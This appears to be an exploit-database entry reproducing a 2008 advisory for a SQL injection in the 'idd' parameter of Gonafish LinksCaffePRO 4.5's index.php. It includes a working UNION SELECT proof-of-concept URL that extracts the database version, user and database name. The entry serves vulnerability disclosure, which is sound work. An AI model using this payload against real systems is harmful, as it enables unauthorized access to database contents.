header-logo
Suggest Exploit
vendor:
LinksCaffePRO
by:
sl4xUz
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: LinksCaffePRO
Affected Version From: 4.5
Affected Version To: 4.5
Patch Exists: NO
Related CWE: N/A
CPE: a:gonafish:linkscaffepro:4.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Gonafish LinksCaffePRO 4.5 (index.php) SQL Injection Vulnerability

LinksCaffePRO is a MySQL database driven link indexing script written in PHP 4. Using the admin script, an attacker can inject malicious SQL queries in the 'idd' parameter of the 'index.php' file, allowing them to access sensitive information from the database.

Mitigation:

N/A
Source

Exploit-DB raw data:

###########################################################
# 
#        ___    __ __                  __  __            
#       /\_ \  /\ \\ \                /\ \/\ \           
#   ____\//\ \ \ \ \\ \    __  _ __  _\ \ \ \ \  ____    
#  /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\  
# /\__, `\ \_\ \_\ \__ ,__\\>  <\\>   <\\ \ \_\ \/_/  /_ 
# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\
#  \/___/  \/____/   \/_/  \//\/_///\/_/  \/_____/\/____/
# 
#                                 security breakd0wn!
###########################################################
# 
# Title: Gonafish LinksCaffePRO 4.5 (index.php) SQL Injection Vulnerability
# Vendor: http://gonafish.com/
# Vulnerable Version: 4.5
# Fix: N/A
# 
###########################################################
# 
# disc0vered: sl4xUz
# c0ntact: sl4x.xuz[at]gmail[dot]com
# d0rk: "negative"
# stop lammo
# 
###########################################################

######################
  1. Information
######################
     LinksCaffePRO is a MySQL database driven link indexing script written in PHP 4. Using the admin script you have full control to add/modify/remove any link(s) or categorie(s).

######################
  2. Vulnerabilities
######################
     SQL Injection in "index.php" in the "idd" parameter.

######################
  3. PoC
######################
     http://localhost/path/index.php?action=deadlink&idd=-1+union+select+1,2,version(),4,concat(user(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

###########################################################

# milw0rm.com [2008-09-16]